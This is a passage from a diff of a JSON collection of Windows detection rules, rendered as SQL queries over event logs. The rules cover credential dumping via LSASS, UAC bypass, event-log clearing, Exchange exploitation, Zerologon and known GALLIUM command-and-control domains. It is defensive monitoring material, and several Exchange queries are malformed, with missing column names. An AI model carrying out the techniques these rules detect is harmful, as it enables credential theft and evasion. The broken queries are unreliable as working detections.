"7ac407cc-0f48-4328-aede-de1d2e6fef41", + "status": "experimental", + "description": "Detect standard users login that are part of high privileged groups such as the Administrator group", "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.credential_access", + "attack.privilege_escalation" ], "falsepositives": [ - "Unknown" + "Standard domain users who are part of the administrator group. These users shouldn't have these right. 
But in the case where it's necessary. They should be filtered out using the \"TargetUserName\" field" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Environment\\\\windir' ESCAPE '\\' AND Details LIKE '%&REM%' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-LSA/Operational' AND (EventID = '300' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND (SidList LIKE '%S-1-5-32-544%' ESCAPE '\\' OR SidList LIKE '%-500}%' ESCAPE '\\' OR SidList LIKE '%-518}%' ESCAPE '\\' OR SidList LIKE '%-519}%' ESCAPE '\\')) AND NOT ((TargetUserSid LIKE '%-500' ESCAPE '\\' OR TargetUserSid LIKE '%-518' ESCAPE '\\' OR TargetUserSid LIKE '%-519' ESCAPE '\\')))" ], - "filename": "registry_set_bypass_uac_using_silentcleanup_task.yml" + "filename": "win_lsa_server_normal_user_admin.yml" }, { - "title": "Disabled Windows Defender Eventlog", - "id": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", - "status": "experimental", - "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections", - "author": "Florian Roth (Nextron Systems)", + "title": "Exchange Set OabVirtualDirectory ExternalUrl Property", + "id": "9db37458-4df2-46a5-95ab-307e7f29e675", + "status": "test", + "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log", + "author": "Jose Rodriguez @Cyb3rPandaH", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Other Antivirus software installations could cause Windows to disable that eventlog (unknown)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 
'%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Windows Defender/Operational\\\\Enabled%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Set-OabVirtualDirectory' AND = 'ExternalUrl' AND LIKE 'Page\\_Load' ESCAPE '\\' AND = 'script')" ], - "filename": "registry_set_disabled_microsoft_defender_eventlog.yml" + "filename": "win_exchange_set_oabvirtualdirectory_externalurl.yml" }, { - "title": "DHCP Callout DLL Installation", - "id": "9d3436ef-9476-4c43-acca-90ce06bdf33a", - "status": "test", - "description": "Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", - "author": "Dimitrios Slamaris", + "title": "Failed MSExchange Transport Agent Installation", + "id": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", + "status": "experimental", + "description": "Detects a failed installation of a Exchange Transport Agent", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" + "attack.persistence", + "attack.t1505.002" ], "falsepositives": [ - "Unknown" + "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutDlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutEnabled' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID = '6' AND Data LIKE '%Install-TransportAgent%' ESCAPE '\\')" ], - "filename": "registry_set_dhcp_calloutdll.yml" + "filename": "win_exchange_transportagent_failed.yml" }, { - "title": "CobaltStrike Service Installations in Registry", - "id": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", - "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\nWe can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml)\nIn some SIEM you can catch those events also in HKLM\\System\\ControlSet001\\Services or HKLM\\System\\ControlSet002\\Services, however, this rule is based on a regular sysmon's events.\n", - "author": "Wojciech Lesicki", + "title": "Possible Exploitation of Exchange RCE CVE-2021-42321", + "id": "c92f1896-d1d2-43c3-92d5-7a5b35c217bb", + "status": "experimental", + "description": "Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321", + "author": "Florian Roth (Nextron Systems), @testanull", "tags": [ - "attack.execution", - "attack.privilege_escalation", "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.t1210" ], "falsepositives": [ - "Unknown" + "Unknown, please report false positives via https://github.com/SigmaHQ/sigma/issues" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%HKLM\\\\System\\\\CurrentControlSet\\\\Services%' ESCAPE '\\') AND ((Details LIKE '%ADMIN$%' ESCAPE '\\' AND Details LIKE '%.exe%' ESCAPE '\\') OR (Details LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND Details LIKE '%start%' ESCAPE '\\' AND Details LIKE '%powershell%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID IN ('6', '8') AND (Data LIKE '%Cmdlet failed. Cmdlet Get-App, %' ESCAPE '\\' OR Data LIKE '%Task Get-App throwing unhandled exception: System.InvalidCastException:%' ESCAPE '\\'))" ], - "filename": "registry_set_cobaltstrike_service_installs.yml" + "filename": "win_exchange_cve_2021_42321.yml" }, { - "title": "Wdigest Enable UseLogonCredential", - "id": "d6a9b252-c666-4de6-8806-5561bbbd3bdc", + "title": "Remove Exported Mailbox from Exchange Webserver", + "id": "09570ae5-889e-43ea-aac0-0e1221fb3d95", "status": "test", - "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1070" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%WDigest\\\\UseLogonCredential' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Remove-MailboxExportRequest' AND = ' -Identity ' AND = ' -Confirm \"False\"')" ], - "filename": 
"registry_set_wdigest_enable_uselogoncredential.yml" + "filename": "win_exchange_proxyshell_remove_mailbox_export.yml" }, { - "title": "VBScript Payload Stored in Registry", - "id": "46490193-1b22-4c29-bdd6-5bf63907216f", + "title": "Important Scheduled Task Deleted", + "id": "9e3cb244-bdb8-4632-8c90-6079c8f4f16d", "status": "experimental", - "description": "Detects VBScript content stored into registry keys as seen being used by UNC2452 group", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.impact", + "attack.t1489" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (Details LIKE '%vbscript:%' ESCAPE '\\' OR Details LIKE '%jscript:%' ESCAPE '\\' OR Details LIKE '%mshtml,%' ESCAPE '\\' OR Details LIKE '%RunHTMLApplication%' ESCAPE '\\' OR Details LIKE '%Execute(%' ESCAPE '\\' OR Details LIKE '%CreateObject%' ESCAPE '\\' OR Details LIKE '%window.close%' ESCAPE '\\')) AND NOT ((TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\') OR (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Installer\\\\UserData\\\\%' ESCAPE '\\' AND (Details LIKE '%\\\\Microsoft.NET\\\\Primary Interop Assemblies\\\\Microsoft.mshtml.dll%' ESCAPE '\\' OR Details LIKE '%<\\\\Microsoft.mshtml,fileVersion=%' ESCAPE '\\' OR Details LIKE '%\\_mshtml\\_dll\\_%' ESCAPE '\\' OR Details LIKE '%<\\\\Microsoft.mshtml,culture=%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '141' AND 
(TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((UserName LIKE '%AUTHORI%' ESCAPE '\\' OR UserName LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "registry_set_vbs_payload_stored.yml" + "filename": "win_taskscheduler_susp_schtasks_delete.yml" }, { - "title": "Disable Microsoft Office Security Features", - "id": "7c637634-c95d-4bbf-b26c-a82510874b34", + "title": "GALLIUM Artefacts - Builtin", + "id": "3db10f25-2527-4b79-8d4b-471eb900ee29", "status": "test", - "description": "Disable Microsoft Office Security Features by registry", - "author": "frack113", + "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", + "author": "Tim Burrell", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%VBAWarnings' ESCAPE '\\' OR TargetObject LIKE '%DisableInternetFilesInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableUnsafeLocationsInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableAttachementsInPV' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (EventID = '257' AND QNAME IN ('asyspy256.ddns.net', 'hotkillmail9sddcc.ddns.net', 'rosaf112.ddns.net', 'cvdfhjh1231.myftp.biz', 
'sz2016rose.ddns.net', 'dffwescwer4325.myftp.biz', 'cvdfhjh1231.ddns.net'))" ], - "filename": "registry_set_disable_microsoft_office_security_features.yml" + "filename": "win_dns_analytic_apt_gallium.yml" }, { - "title": "Disable Security Events Logging Adding Reg Key MiniNt", - "id": "919f2ef0-be2d-4a7a-b635-eb2b41fde044", - "status": "test", - "description": "Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events.", - "author": "Ilyas Ochkov, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" - ], + "title": "New Firewall Exception Rule Added For A Suspicious Folder", + "id": "9e2575e7-2cb9-4da1-adc8-ed94221dca5e", + "status": "experimental", + "description": "Detects the addition of a rule to the Windows Firewall exception list where the application resides in a suspicious folder", + "author": "frack113", "falsepositives": [ - "Unknown" + "Any legitimate application that runs from the AppData user directory" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\' AND EventType = 'CreateKey') OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND ((EventID IN ('2004', '2071') AND (ApplicationPath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ApplicationPath LIKE '%\\\\Temp\\\\%' ESCAPE '\\')) AND NOT ((Action = '2'))) AND NOT ((ApplicationPath LIKE '%\\\\AppData\\\\local\\\\microsoft\\\\teams\\\\current\\\\teams.exe' ESCAPE '\\') OR (ApplicationPath LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\') OR (ApplicationPath LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Messenger\\\\Messenger.exe' ESCAPE '\\')))" ], - 
"filename": "registry_event_disable_security_events_logging_adding_reg_key_minint.yml" + "filename": "win_firewall_as_add_rule_susp_folder.yml" }, { - "title": "PrinterNightmare Mimimkatz Driver Name", - "id": "ba6b9e43-1d45-4d3c-a504-1043a64c8469", - "status": "test", - "description": "Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527", - "author": "Markus Neis, @markus_neis, Florian Roth", + "title": "All Rules Have Been Deleted From The Windows Firewall Configuration", + "id": "79609c82-a488-426e-abcf-9f341a39365d", + "status": "experimental", + "description": "Detects when a all the rules have been deleted from the Windows Defender Firewall configuration", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2033', '2059') AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\'))) AND NOT ((ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" + ], + "filename": "win_firewall_as_delete_all_rules.yml" + }, + { + "title": "Sysmon Crash", + "id": "4d7f1827-1637-4def-8d8a-fd254f9454df", + "status": "experimental", + "description": "Detects application popup reporting a failure of the Sysmon service", + "author": "Tim Shelton", "tags": [ - "attack.execution", - "attack.t1204", - "cve.2021.1675", - "cve.2021.34527" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)" + "Unknown" ], - "level": "critical", + "level": "high", 
"rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\QMS 810\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\mimikatz%' ESCAPE '\\') OR (TargetObject LIKE '%legitprinter%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentVersion\\\\Print\\\\Printers%' ESCAPE '\\') AND (TargetObject LIKE '%Gentil Kiwi%' ESCAPE '\\' OR TargetObject LIKE '%mimikatz printer%' ESCAPE '\\' OR TargetObject LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Application Popup' AND EventID = '26' AND Caption = 'sysmon64.exe - Application Error')" ], - "filename": "registry_event_mimikatz_printernightmare.yml" + "filename": "win_system_application_sysmon_crash.yml" }, { - "title": "DLL Load via LSASS", - "id": "b3503044-60ce-4bf4-bbcb-e3db98788823", - "status": "test", - "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", - "author": "Florian Roth (Nextron Systems)", + "title": "Important Windows Eventlog Cleared", + "id": "100ef69e-3327-481c-8e5c-6d80d9507556", + "status": "experimental", + "description": "Detects the clearing of one of the Windows Core Eventlogs. e.g. 
caused by \"wevtutil cl\" command execution", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1547.008" + "attack.defense_evasion", + "attack.t1070.001", + "car.2016-04-002" ], "falsepositives": [ - "Unknown" + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\DirectoryServiceExtPt%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\LsaDbExtPt%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND (Details LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\' OR Details LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\lsadb.dll' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog' AND Channel IN ('System', 'Security', 'Application'))" ], - "filename": "registry_event_susp_lsass_dll_load.yml" + "filename": "win_system_susp_eventlog_cleared.yml" }, { - "title": "Shell Open Registry Keys Manipulation", - "id": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", + "title": "DHCP Server Loaded the CallOut DLL", + "id": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", "status": "test", - "description": "Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. 
UACMe 33 or 62)", - "author": "Christian Burkard (Nextron Systems)", + "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", + "author": "Dimitrios Slamaris", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1546.001" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND Details LIKE '%\\\\Software\\\\Classes\\\\{%' ESCAPE '\\') OR TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR ((EventType = 'SetValue' AND (TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\exefile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\')) AND NOT (Details = '(Empty)'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '1033' AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" ], - "filename": "registry_event_shell_open_keys_manipulation.yml" + "filename": "win_system_susp_dhcp_config.yml" }, { - "title": "Creation of a Local Hidden User Account by Registry", - "id": "460479f3-80b7-42da-9c43-2cc1d54dbccd", - "status": "experimental", - "description": "Sysmon registry detection of a local hidden user account.", - "author": "Christian Burkard (Nextron Systems)", + "title": "DHCP Server Error Failed Loading the CallOut DLL", + "id": "75edd3fd-7146-48e5-9848-3013d7f0282c", + "status": "test", + "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", + "author": "Dimitrios Slamaris, @atc_project (fix)", "tags": [ - "attack.persistence", - "attack.t1136.001" + 
"attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\%' ESCAPE '\\' AND TargetObject LIKE '%$' ESCAPE '\\' AND Image LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('1031', '1032', '1034') AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" ], - "filename": "registry_event_add_local_hidden_user.yml" + "filename": "win_system_susp_dhcp_config_failed.yml" }, { - "title": "OilRig APT Registry Persistence", - "id": "7bdf2a7c-3acc-4091-9581-0a77dad1c5b5", + "title": "QuarksPwDump Clearing Access History", + "id": "39f919f3-980b-4e6f-a975-8af7e507ef2b", "status": "test", - "description": "Detects OilRig registry persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects QuarksPwDump clearing access history in hive", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UMe' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UT' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '16' AND Provider_Name = 'Microsoft-Windows-Kernel-General' AND 
HiveName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM%' ESCAPE '\\' AND HiveName LIKE '%.dmp' ESCAPE '\\')" ], - "filename": "registry_event_apt_oilrig_mar18.yml" + "filename": "win_system_quarkspwdump_clearing_hive_access_history.yml" }, { - "title": "Potential Credential Dumping Via LSASS SilentProcessExit Technique", - "id": "55e29995-75e7-451a-bef0-6225e2f13597", - "status": "experimental", - "description": "Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process", - "author": "Florian Roth (Nextron Systems)", + "title": "Zerologon Exploitation Using Well-known Tools", + "id": "18f37338-b9bd-4117-a039-280c81f7a596", + "status": "stable", + "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.", + "author": "Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "falsepositives": [ - "Unlikely" + "attack.t1210", + "attack.lateral_movement" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\lsass.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('5805', '5723') AND (logs MATCH ('\"kali\" OR \"mimikatz\"')))" ], - "filename": "registry_event_silentprocessexit_lsass.yml" + "filename": "win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" }, { - "title": "Windows Credential Editor Registry", - "id": "a6b33c02-8305-488f-8585-03cb2a7763f2", + "title": "Vulnerable Netlogon Secure Channel Connection Allowed", + "id": "a0cb7110-edf0-47a4-9177-541a4083128a", "status": "test", - "description": "Detects the use of Windows Credential Editor (WCE)", - 
"author": "Florian Roth (Nextron Systems)", + "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", + "author": "NVISO", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0005" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Services\\\\WCESERVICE\\\\Start%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'NetLogon' AND EventID = '5829')" ], - "filename": "registry_event_hack_wce_reg.yml" + "filename": "win_system_vul_cve_2020_1472.yml" }, { - "title": "Suspicious Camera and Microphone Access", - "id": "62120148-6b7a-42be-8b91-271c04e281a3", - "status": "test", - "description": "Detects Processes accessing the camera and microphone from suspicious folder", - "author": "Den Iuzvyk", + "title": "KDC RC4-HMAC Downgrade CVE-2022-37966", + "id": "e6f81941-b1cd-4766-87db-9fc156f658ee", + "status": "experimental", + "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1125", - "attack.t1123" + "attack.privilege_escalation" ], "falsepositives": [ - "Unlikely, there could be conferencing software running from a Temp folder accessing the devices" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NonPackaged%' ESCAPE '\\' AND (TargetObject LIKE 
'%microphone%' ESCAPE '\\' OR TargetObject LIKE '%webcam%' ESCAPE '\\') AND (TargetObject LIKE '%:#Windows#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#$Recycle.bin#%' ESCAPE '\\' OR TargetObject LIKE '%:#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Public#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Default#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Desktop#%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '42' AND Provider_Name = 'Kerberos-Key-Distribution-Center' AND Level = '2')" ], - "filename": "registry_event_susp_mic_cam_access.yml" + "filename": "win_system_kdcsvc_rc4_downgrade.yml" }, { - "title": "NetNTLM Downgrade Attack - Registry", - "id": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", + "title": "NTFS Vulnerability Exploitation", + "id": "f14719ce-d3ab-4e25-9ce6-2899092260b0", "status": "test", - "description": "Detects NetNTLM downgrade attack", - "author": "Florian Roth (Nextron Systems), wagga", + "description": "This the exploitation of a NTFS vulnerability as reported without many details via Twitter", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" + "attack.impact", + "attack.t1499.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%ControlSet%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\lmcompatibilitylevel' ESCAPE '\\' OR TargetObject LIKE '%\\\\NtlmMinClientSec' ESCAPE '\\' OR TargetObject LIKE '%\\\\RestrictSendingNTLMTraffic' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Ntfs' AND EventID = '55' AND Origin = 'File System Driver' AND Description LIKE '%contains a corrupted file record%' ESCAPE '\\' AND Description LIKE '%The name 
